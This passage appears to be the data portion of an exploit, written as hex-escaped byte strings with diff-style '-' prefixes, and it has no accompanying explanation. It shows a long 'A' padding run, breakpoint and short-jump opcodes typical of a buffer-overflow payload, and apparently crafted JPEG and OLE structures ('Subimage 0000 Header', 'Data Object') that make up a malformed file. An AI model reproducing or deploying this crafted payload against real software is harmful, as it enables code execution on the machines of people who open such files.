-"\x3c\xcb\xe8\xcf\xed\xed\xfe\x4f\x42\xa0\x2a\x85\x50\x15\x54\x60" -"\x00\x30\x00\xad\x74\xa5\xfe\x2f\xcb\xfe\x09\x8e\xb5\x77\xf8\x7f" -"\x3f\xf8\x03\x61\x8a\x38\x21\x48\x61\x45\x90\xeb\x07\xcc\x56\x7b" -"\x01\x10\x41\x41\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xd7\xf0\xa5" -"\x09\xc6\xa6\xb1\x69\x97\x25\x28\xee\x86\x51\x49\x1b\x89\x23\x59" -"\x17\x3b\x58\x06\x19\x18\xe0\xd2\xd5\x08\x28\xa2\x8a\x06\x00\xff" -"\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff" -"\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03" -"\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00" -"\xef\x74\xcd\x3a\xdb\x4b\xb4\x16\xf6\xab\x81\xd5\x98\xfd\xe7\x3e" -"\xa4\xd5\xaa\x28\xa4\xdb\x6e\xec\xa4\x94\x55\x90\x53\x64\x90\x45" -"\x1b\xc8\xdd\x11\x4b\x1f\xc0\x66\x9d\x59\xbe\x24\x9c\x5b\xf8\x7a" -"\xf6\x4c\xe0\x98\x8a\x0f\xab\x71\xfd\x69\xc6\x3c\xd2\x48\x53\x97" -"\x2c\x5c\xbb\x10\x78\x45\x18\x68\x11\xcc\xe3\x0f\x71\x23\xca\x7f" -"\x13\xff\x00\xd6\xad\x9a\xad\xa6\x41\xf6\x5d\x2e\xd6\x0f\xf9\xe7" -"\x12\xa9\xfa\xe3\x9a\xb3\x4e\xa4\xb9\xa6\xd9\x34\xa3\xcb\x04\x82" -"\xb0\x75\x1f\xf8\x93\xeb\xf0\xea\x6b\x91\x6b\x77\x88\x6e\xbd\x15" -"\xbf\x85\xbf\xcf\xf5\xad\xea\x82\xfe\xd2\x2b\xfb\x19\xad\x27\x1f" -"\x24\xab\x8c\xfa\x1e\xc7\xf0\x34\x53\x92\x8b\xd7\x60\xa9\x17\x25" -"\xa6\xeb\x62\x7a\x28\xa2\xa0\xd0\x2b\x13\xc5\x27\xcd\x82\xc6\xc8" -"\x75\xb9\xbb\x45\x23\xfd\x91\xc9\xfe\x95\xb7\x58\x97\xdf\xe9\x1e" -"\x30\xd3\x61\xed\x6f\x0c\x93\x91\xf5\xe0\x7f\x2a\xd6\x8f\xc5\x7e" -"\xda\x98\xd6\xf8\x2d\xde\xc8\xdc\x3d\x78\xa4\xa2\x8a\xc8\xd8\x28" -"\xa2\x8a\x00\x28\xa2\x8a\x00\x2b\x17\x4d\x3e\x7f\x8b\x35\x59\xfb" -"\x42\x91\xc0\xa7\xf0\xc9\xfe\x55\xb5\xc7\x7e\x95\x89\xe1\x31\xe6" -"\x58\xdd\x5e\x1e\x4d\xd5\xd4\x92\x67\xdb\x38\x1f\xd6\xb5\x86\x91" 
-"\x93\xf9\x7f\x5f\x71\x8c\xf5\x9c\x57\xcf\xfa\xfb\xcd\xba\x28\xa2" -"\xb2\x36\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x20\xbf\x32\x8d\x3e\xe3" -"\xec\xea\x5e\x6f\x29\xb6\x28\xea\x5b\x1c\x54\x1a\x15\xab\x59\x68" -"\x76\x96\xee\xbb\x1d\x23\x05\xd4\xf6\x63\xc9\xfe\x75\x7a\x8a\xae" -"\x6f\x77\x94\x8e\x5f\x7b\x98\x28\xa2\x8a\x92\xc2\x8a\x28\xa0\x00" -"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf4\x7a\x2b\x23\xc3\x77\x92\xcb\x69\x25\x8d\xd9\xff\x00\x4b" -"\xb1\x6f\x2a\x4c\xff\x00\x10\xfe\x16\xfc\xab\x5e\x89\xc5\xc5\xd9" -"\x84\x24\xa7\x15\x24\x54\xd4\xf4\xcb\x5d\x52\xdf\xca\xba\x4c\x91" -"\xca\x48\xbc\x32\x1f\x50\x6b\x2e\x3d\x42\xf3\x43\x91\x6d\xf5\x92" -"\xd7\x16\x84\xe2\x3b\xe5\x5e\x9e\xce\x3f\xaf\xf3\xad\xfa\x6c\x91" -"\xa4\xb1\xb4\x72\xa2\xba\x30\xc3\x2b\x0c\x82\x2a\xa3\x3b\x2e\x59" -"\x6a\xbf\xad\x89\x95\x3b\xbe\x68\xe8\xff\x00\xad\xc5\x47\x59\x11" -"\x5e\x36\x0e\x8c\x32\x19\x4e\x41\x14\x92\x22\xcb\x1b\x46\xe3\x2a" -"\xc3\x04\x7b\x56\x03\xd8\xde\xe8\x0e\xd3\xe9\x21\xae\x6c\x09\xdd" -"\x25\x99\x39\x64\xf5\x28\x7f\xa7\xf3\xad\x7d\x3b\x51\xb5\xd4\xed" -"\xbc\xfb\x49\x37\x2f\x46\x53\xc3\x21\xf4\x23\xb5\x12\x85\x97\x34" -"\xc6\x9a\x48\x96\xd9\x01\x17\x57\x12\xec\x59\xc8\x20\xfc\xc5\x3a" -"\x2f\xb6\x7b\x9a\x5f\xb3\xcf\x2a\x3f\x95\x73\x22\xbc\x6e\x40\xc9" -"\xe0\xfd\x6a\xf2\x08\xa1\x51\x1a\xe1\x40\xed\x50\xdb\x3a\xab\x4f" -"\xb9\x80\xcc\x84\x8c\xfd\x05\x3e\x61\x72\xf7\x2c\x64\xb1\x20\xa9" -"\x03\xd7\xd6\x9b\x20\x64\x88\xf9\x2a\x0b\x76\x06\xa4\xa2\xa0\xd0" -"\xa1\x14\x57\x0d\x76\x25\x9a\x08\xf8\x3c\x31\x6c\x91\xf4\xf4\xab" -"\xf4\x52\x12\x00\xc9\x38\x1e\xf4\x01\x5a\xf7\xcf\x2b\xb2\x28\x52" -"\x44\x60\x77\x06\x35\x2d\xb1\x73\x6e\x86\x44\x11\xb6\x39\x51\xda" -"\x87\x9d\x47\x0b\xc9\xaa\xf2\x4e\xc7\x8c\xf3\xe8\x28\x0b\x10\x6a" 
-"\xee\xeb\x0b\xb4\x64\x83\x91\xca\xd6\x24\x37\x17\x9e\x79\xdd\x23" -"\x91\xb8\x6d\xc1\x26\xb5\x89\x7b\x86\x21\x1b\x6c\x63\xef\x38\xef" -"\xec\x3f\xc6\xab\x47\x6e\x57\xca\x9a\x37\x29\xe6\x1c\x67\xa8\x07" -"\x3c\x64\x57\x3d\x4c\x33\xa9\x35\x2e\x6b\x1a\x46\xb7\x24\x6d\xcb" -"\x73\xa2\xa6\xb3\xaa\xfd\xe3\x8a\x86\x69\x18\x39\x50\x70\x2a\x1a" -"\xde\xe4\x58\x99\xae\x0f\xf0\x0f\xc4\xd4\x4c\xc4\xf2\xc7\xf3\xa4" -"\x3c\x0e\x99\xa8\x5a\x68\x95\xf1\x34\x8a\xa7\xae\xd2\x69\x37\xdc" -"\x76\x1e\x5f\x20\x90\x70\xa3\xab\x1a\x80\x03\x73\x9c\x65\x61\xee" -"\x7b\xbf\xff\x00\x5a\x9a\xb2\x25\xdc\xdb\x59\xd4\xa0\x3f\x2a\x03" -"\x9d\xde\xe6\xae\x0e\x9c\x74\xa6\x9a\xe8\x2b\x5f\x72\x2b\x82\x22" -"\xb4\x7d\xa3\x00\x2e\x00\x14\x79\x2a\xd6\xa2\x16\xce\x36\xe3\x8e" -"\xb4\x5c\x23\x49\x18\x55\xee\xc3\x3f\x4c\xd4\xb4\x5f\x40\xb6\xa0" -"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00" -"\x40\x00\x00\x00\x37\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" -"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00" -"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11" -"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00" -"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x2a\x00\x02\x01\x15\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x6e\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00" -"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" -"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00" -"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x6f\x00\x00\x00\x5e\x02\x00\x00\x00\x00\x00\x00" -"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00" -"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00" -"\x30\x00\x30\x00\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x28\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x02\x00\x00\x00\x94\x00\x00\x00\x00\x00\x00\x00" -"\x05\x00\x4f\x00\x70\x00\x65\x00\x72\x00\x61\x00\x74\x00\x69\x00" -"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00" -"\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x24\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00" -"\x75\x41\x1a\x97\x7c\xb2\x56\x61\x6d\x6b\x35\xb4\xbb\x56\xe9\xe5" -"\xb7\xc7\x11\xca\x37\x32\x9f\x66\xea\x47\xd7\x3f\x5a\x94\x5d\x5b" -"\x9b\xa3\x6b\xe6\xa8\x9c\x0c\xf9\x67\x82\x47\xa8\xf5\xfc\x2a\x5a" 
-"\x8a\xe6\xd6\x0b\xb8\xbc\xbb\x98\x96\x45\x1c\x8c\x8e\x41\xf5\x07" -"\xb1\xfa\x54\xde\xef\x52\xac\xd2\xf7\x4c\x6d\x6c\x1d\x2f\x54\xb7" -"\xd6\xe3\x07\xca\xe2\x1b\xb0\x3b\xa9\xe8\xdf\x87\xf8\x56\xf0\x20" -"\x80\x41\x04\x11\x90\x47\x7a\x8e\xe6\x08\xee\xad\xa4\xb7\x9d\x77" -"\x47\x22\x95\x61\xec\x6b\x27\xc3\x73\xcb\x12\xcf\xa4\x5d\xb6\x67" -"\xb1\x6d\xaa\xc7\xf8\xe3\x3f\x74\xff\x00\x9f\x6a\xd1\xfb\xf0\xbf" -"\x55\xf9\x19\xaf\x72\x76\xe8\xff\x00\x33\x6a\x8a\x28\xac\x4d\xc2" -"\xb2\x35\x1d\x14\xbd\xc9\xd4\x34\xa9\x45\xa5\xf8\xea\x47\xdc\x97" -"\xd9\x87\xf5\xad\x7a\x2a\xa3\x27\x17\x74\x44\xe0\xa6\xac\xcc\xad" -"\x33\x5a\x5b\x89\xcd\x8d\xfc\x5f\x63\xd4\x17\xac\x4d\xd1\xfd\xd4" -"\xf7\xad\x5a\xa7\xa9\xe9\x96\xba\xa5\xbf\x95\x72\xb8\x65\xe5\x24" -"\x5e\x19\x0f\xa8\x35\x99\x16\xa5\x79\xa2\xca\xb6\xba\xe1\x33\x5b" -"\xb1\xc4\x57\xca\xbc\x7d\x1c\x76\x3f\xe7\x9a\xd3\x95\x4f\x58\x6f" -"\xdb\xfc\x8c\xf9\xdd\x3d\x27\xb7\x7f\xf3\x37\xeb\x0f\xc4\x31\xbd" -"\x95\xc5\xbe\xb9\x6e\xa5\x9a\xdb\xe4\x9d\x47\xf1\xc4\x7f\xc3\xfc" -"\xf4\xad\xca\x6c\x91\xa4\xb1\x34\x72\x28\x64\x70\x55\x94\xf7\x07" -"\xa8\xa8\x84\xb9\x65\x72\xea\x43\x9e\x36\x08\xe4\x49\x62\x49\x62" -"\x60\xc8\xea\x19\x58\x77\x07\xa5\x3a\xb0\xfc\x3c\xef\x63\x75\x71" -"\xa1\xdc\x31\x2d\x01\xf3\x2d\xd8\xff\x00\x14\x44\xff\x00\x4f\xf3" -"\xd2\xb7\x28\x9c\x79\x5d\x82\x9c\xf9\xe3\x70\xa2\x8a\x2a\x0d\x02" -"\x9b\x2c\x51\xcd\x13\x45\x32\x2c\x91\xb8\xc3\x2b\x0c\x82\x29\xd4" -"\x50\x20\xa2\x8a\x28\x19\x8d\xe2\x4b\x79\x63\x8e\x1d\x5a\xd1\x73" -"\x73\x62\x77\x11\xfd\xf8\xff\x00\x88\x7f\x9f\x7a\xd5\xb6\xb8\x8e" -"\xea\xd6\x2b\x88\x0e\xe8\xe5\x50\xca\x7d\x8d\x48\x40\x20\x82\x01" -"\x07\x82\x0f\x7a\xcb\xd1\x2c\x2e\x34\xc6\xba\xb5\x38\x36\x62\x4d" -"\xf6\xc7\x3c\x80\x7a\xae\x3d\xab\x5b\xa9\x42\xcf\x74\x63\x67\x19" -"\xdd\x6c\xff\x00\x33\x52\x8a\x28\xac\x8d\x82\x8a\x28\xb7\x44\x6b" -"\xe6\x66\xb6\xf9\xd6\x31\x89\xc8\x1d\x09\x3f\x28\x3f\x86\x7f\x1a" -"\x69\x5c\x4d\xd8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22" -"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11" -"\x03\x11\x00\x3f\x00\xf4\x7a\x2a\x29\xda\x68\x61\x06\xde\x11\x39" -"\x5c\x65\x0b\xed\x24\x7b\x13\xdf\xeb\x4d\xb5\xba\x8e\xe9\x5b\x62" -"\xc8\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x29\x59\xda\xe3" -"\xe6\x57\xb1\x3d\x14\x51\x48\xa0\xa2\x8a\x28\x01\x22\x55\x84\x30" -"\x85\x44\x61\x89\x27\x68\xc6\x49\xef\xf5\xa7\x2c\xd3\x43\x6b\xb4" -"\x66\xe6\x55\x5e\x0b\x90\xa5\xcf\xb9\x03\x03\xf2\xa4\xa2\x9d\xc5" -"\x60\xa5\xcd\x35\x59\x5d\x43\x23\x06\x52\x32\x18\x1c\x82\x29\x69" -"\x0c\xa7\x1c\x57\xb0\x4e\x00\x99\x6e\x6d\xd9\xb9\xf3\x78\x92\x31" -"\xec\x40\xc3\x0f\xaf\x3e\xf5\x6f\x7a\xf9\x82\x3d\xcb\xbc\x8c\x85" -"\xcf\x24\x7a\xe2\x96\xa1\xba\xb4\xb7\xbb\x50\x27\x8c\x31\x5f\xba" -"\xe0\xe1\x97\xdc\x11\xc8\xaa\xbd\xde\xa4\x59\xa5\xa1\x35\x15\x0a" -"\x87\xb6\xb4\xc6\x66\xba\x64\x1c\x67\x1b\xdb\xf9\x0c\xd2\x5a\xde" -"\xdb\xdd\x6e\x10\xbf\xce\xbf\x7a\x37\x05\x5d\x7e\xaa\x79\x14\xac" -"\xf7\x1f\x32\xd9\x93\xd1\x45\x14\x8a\x39\xf6\xb4\xbd\xf0\xf3\x34" -"\xba\x62\xb5\xde\x9c\x4e\x5e\xd4\x9c\xbc\x7e\xa5\x0f\x7f\xa7\xff" -"\x00\xae\xb5\xf4\xfb\xfb\x5d\x4a\xd8\x4f\x67\x28\x91\x3b\x8e\xea" -"\x7d\x08\xed\x56\x6b\x1f\x50\xd1\x5b\xed\x27\x50\xd2\x25\x16\x97" -"\xbf\xc4\x31\xf2\x4d\xec\xc3\xfa\xd6\xdc\xca\xa7\xc5\xbf\x7f\xf3" -"\xff\x00\x33\x0e\x59\x53\xf8\x35\x5d\xbf\xcb\xfc\x8d\x8a\x2b\x2f" -"\x4b\xd6\x52\xee\x63\x67\x79\x11\xb3\xbf\x4f\xbd\x0b\xff\x00\x17" -"\xba\x9e\xe2\xb5\x2b\x39\x45\xc5\xd9\x9a\xc6\x6a\x6a\xe8\x29\x36" -"\x29\x90\x48\x55\x77\x81\x80\xd8\xe7\x1e\x99\xa5\xa2\xa4\x65\x39" -"\xe5\xbe\xb7\x99\x9d\x61\x5b\xab\x73\xfc\x31\xfc\xb2\x27\xe0\x78" -"\x6f\xd0\xd5\xc1\xcd\x15\x0d\xd5\xac\x77\x51\x85\x90\xba\x95\x3b" -"\x95\xe3\x72\xac\xa7\xd4\x11\x55\x74\xc5\x66\xb6\x26\xa2\xad\x08" -"\x21\x59\x9a\x61\x12\x09\x58\x05\x67\xc7\x24\x0e\x83\x35\x95\x3e" 
-"\xab\x63\x69\x77\x74\x96\xd6\xc6\x5b\x81\x8f\x30\xc6\xa0\x06\x6f" -"\x42\xc7\xb8\x15\x32\x71\x8a\xbc\x9d\x90\xd5\xdb\xb2\x43\x75\x4d" -"\x2a\xd7\x54\x84\x25\xc2\x90\xe9\xcc\x72\xa1\xc3\xa1\xf6\x35\x4e" -"\xc2\xef\x51\xb2\xbc\x8f\x4e\xd5\x63\x6b\x80\xfc\x43\x79\x1a\xe4" -"\x37\xb3\xfa\x1f\xf3\xef\x53\x47\xad\xa4\x30\xb3\xc3\xa5\x15\x92" -"\x47\x2c\xe8\x1d\x46\x4f\xf7\x89\xef\x4a\xba\xd4\x50\x6c\x8a\x0d" -"\x2c\x88\x9b\x97\xda\xca\x02\x92\x79\xe3\xbd\x4a\xc5\xd2\xb7\x2b" -"\x92\x6b\xd7\xfa\xff\x00\x82\x4b\xa1\x3b\xf3\x28\xb4\xff\x00\xaf" -"\xeb\xc8\xd2\xa2\xb3\x23\xd5\xed\xd5\x1e\xd0\x69\x7b\x6d\x42\x95" -"\x50\x0a\xe1\x87\xa6\xde\xd9\xa6\x9d\x62\x29\x2c\x1a\x09\x34\x8f" -"\x90\x00\xab\x01\x75\x2a\x56\xa3\xeb\x14\x7f\x9d\x1a\xfb\x3a\x9f" -"\xca\xcd\x5a\x2b\x32\x6d\x6a\x19\x60\x89\x66\xd2\x9a\x55\x27\x2e" -"\x99\x43\xb3\x07\x8c\x67\xad\x6d\x6c\xb6\xbb\x48\xe4\xdb\x1c\xaa" -"\xad\xbd\x1b\x19\xc1\x1d\xc7\xbd\x5c\x27\x09\xfc\x32\xb9\x32\x52" -"\x8e\xe8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02" -"\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11" -"\x00\x3f\x00\xf4\xd7\xbc\x86\x28\x96\x49\xdc\x45\x92\x17\x9e\xc4" -"\xf6\xab\x15\x46\x91\x93\x73\xc6\xfb\x9c\x18\xce\x57\x6b\x10\x3f" -"\x11\xdf\xf1\xa2\xe3\xb3\x2f\xd5\x6d\x46\xec\x58\xd8\x4d\x72\x50" -"\xb9\x45\xe1\x41\xc6\xe2\x78\x03\xf3\x22\x9a\x27\x9b\xcf\x5c\x98" -"\xcc\x5b\x4e\x46\x0e\xec\xf6\xe7\xa6\x29\x27\x36\xf7\xc9\x3d\x95" -"\xc4\x4f\xe5\xb2\x00\xc5\x86\x03\x03\xe8\x7d\x45\x35\x6b\xea\x4c" -"\xaf\x6d\x0a\x17\x93\xea\xda\x5d\x93\xdf\xdc\xcf\x05\xca\xa0\xcc" -"\x90\x24\x5b\x71\x9f\xee\xb6\x79\xc1\xf5\xea\x3d\x2a\x4b\x7d\x42" -"\xdb\x4c\xb5\x86\xce\xf2\xe2\x49\x6e\xa3\x8c\x34\xdb\x51\xa4\x2a" -"\x4f\x24\xb6\x01\xc0\xcf\xaf\x6a\x6c\xba\x65\xdd\xc8\x82\x29\x35" -"\x4f\x3e\xda\x29\x95\xa4\x42\x80\x17\x0b\xce\x18\x8e\xa7\x20\x7a" 
-"\x52\x5b\x5c\xae\x95\x71\x79\x1d\xdc\x13\x93\x2c\xed\x2c\x72\x47" -"\x0b\x38\x94\x1e\x83\xe5\x07\x91\xd3\x07\xd0\x56\xda\x35\x6d\xfd" -"\x0c\x35\x4e\xfb\x2f\x33\x5e\x19\x63\x9e\x14\x96\x17\x57\x8d\xc6" -"\xe5\x65\x39\x04\x53\xeb\x99\x82\xda\xe6\x59\x6d\x2c\x37\xc9\x67" -"\xba\x59\x6f\x64\x44\x23\x74\x68\x58\xed\x4f\x4e\x77\x7e\x86\xac" -"\xd9\xc9\xa9\xad\xcd\xf5\xb5\xa4\xa9\x34\x16\xee\x15\x65\xbb\x24" -"\x9c\x63\x9a\x4a\x00\x28\xa5\xc1\xc6\x71\xc5\x18\x3e\x86\x80\x2e" -"\xd6\x6c\x91\xc3\x04\x73\x81\xb9\xa3\x25\xdd\x80\x25\x89\x27\x93" -"\x8f\xf0\xad\x2a\xcf\x45\x85\x5a\x4f\xb3\xed\x0a\x64\x62\xdb\x4f" -"\xf1\x67\xe6\xfc\x73\x9a\x6f\x62\x56\xe6\x1c\x01\x8d\x86\x76\xdd" -"\x00\xd3\x06\xb8\x45\x0d\x90\x9c\xe1\x41\x3c\x9f\x7c\x53\x8c\x32" -"\xc9\x1c\x69\x18\xb8\x4b\x56\xbb\x40\x80\x92\x18\x26\x0e\xef\x70" -"\x33\x5b\x84\xf7\x27\xf3\xa8\x45\xed\xab\x2a\x30\xb9\x8f\x0e\x70" -"\xa7\x77\x53\x5c\xbe\xc9\x2d\x1b\x3b\x7d\xbc\x9b\xba\x5f\xd7\xf5" -"\xf8\x18\xf3\x45\x72\x90\x3c\x0b\xe6\x0b\x64\xb9\x60\x72\x19\xb0" -"\x98\x18\xe9\xc9\x19\xad\x1d\x29\x65\x4b\x22\x1d\xd9\x86\xe3\xe5" -"\x87\x52\xbb\x47\xa7\x39\x38\xab\x0b\x75\x6e\x49\x0b\x3a\x12\xa4" -"\x02\x01\xe8\x73\x8f\xe7\xc5\x2a\xdc\xc0\xee\x55\x66\x46\x60\xdb" -"\x48\x0d\xce\x6a\xa3\x08\xc6\x57\xb9\x33\xa9\x29\x47\x95\xa3\x37" -"\x4c\x09\xe7\x27\x9e\xb7\x9f\x6c\xe7\xcc\x66\xce\xdf\xf0\xc7\xa6" -"\x2a\xb5\xbd\xbc\xf1\x5a\xda\x4a\xbe\x79\x96\x54\x95\x65\x04\x93" -"\xd8\xed\xc8\xed\x5b\x26\xf2\xd8\x75\xb8\x8c\x63\x1f\xc5\xeb\xd2" -"\xab\x6a\x5a\x84\xf6\xb3\xc1\x6f\x69\x69\xf6\x99\xa6\x56\x7c\x19" -"\x36\x05\x51\x8c\xf3\xf8\x8a\x23\x45\x4a\xc9\x3f\xeb\xfa\x41\x3c" -"\x4b\x85\xdb\x5b\xff\x00\xc1\xff\x00\x33\x76\xa8\x2b\x44\xed\x21" -"\x83\x6e\xd1\x23\x03\xb4\x63\xe6\x07\xe6\xfd\x73\x57\xeb\x32\x72" -"\x2f\x20\xb8\x48\x8b\x46\x49\x78\xf7\x15\xc1\x04\x71\x9a\xe8\x7b" -"\x1c\x91\xdf\x51\xe1\xd1\xd9\xd1\x58\x12\xbc\x36\x3b\x66\xa8\x8d" -"\x1e\x00\x13\x32\x33\x6c\xc8\xe5\x46\x08\x27\x38\xc7\x6a\x82\x4d" 
-"\x26\x57\x56\xda\x61\x88\x16\xcf\x96\x84\x85\xfb\xb8\xfc\xea\xcd" -"\xdd\x81\x9e\x34\x5d\xf9\xd9\x13\x22\x96\x27\x3b\xb8\xc3\x7e\x95" -"\xce\xef\x2d\xe2\x75\xab\x41\xae\x59\xee\x3d\x34\xf8\x95\xe1\x70" -"\x5b\x30\xbb\x30\xe7\x83\x92\x4e\x0f\xd0\xf4\xa8\xe2\xd2\x61\x81" -"\x7f\x73\x23\x23\x02\x19\x1b\x68\xca\xe0\xe4\x7d\x47\xd6\xa3\x97" -"\x4c\x95\xda\x5c\x4a\xab\xbf\x76\x5c\x67\x73\xe4\x83\x86\xfa\x63" -"\x8a\x25\xd2\xb3\xe6\x79\x7b\x17\x7f\x98\x3a\x91\xc1\x20\xa8\xfc" -"\x30\x6a\x5a\xfe\xe9\x4a\x5f\xdf\xfc\x05\xb8\xb3\xb4\x82\xdc\xc7" -"\x35\xd7\x94\xb2\x15\xc3\x36\x01\xca\x8e\xc7\xb1\xef\x4b\x75\x8f" -"\xed\xeb\x4c\xe7\x3f\x67\x97\x1f\xf7\xd2\x54\x97\x36\xb3\xcb\x65" -"\x1d\xba\xbc\x63\xe4\xda\xe7\x04\x73\xc7\x23\x1f\xcb\xbd\x55\xd7" -"\x6d\xda\x46\x82\x68\x35\x38\xac\x6e\xa3\x46\x55\x32\x01\x87\x07" -"\x19\xe0\xf4\xe4\x0e\x6b\xa2\x8c\x7d\xe6\xb6\x39\xb1\x12\xbc\x13" -"\xbd\xdd\xff\x00\xc8\xe9\x6a\x8f\x98\x64\x67\x62\x8c\x98\x72\xb8" -"\x6e\xf8\x38\xcf\xd0\xf5\xab\xd5\x44\x33\xbb\x39\x92\x3f\x2c\x87" 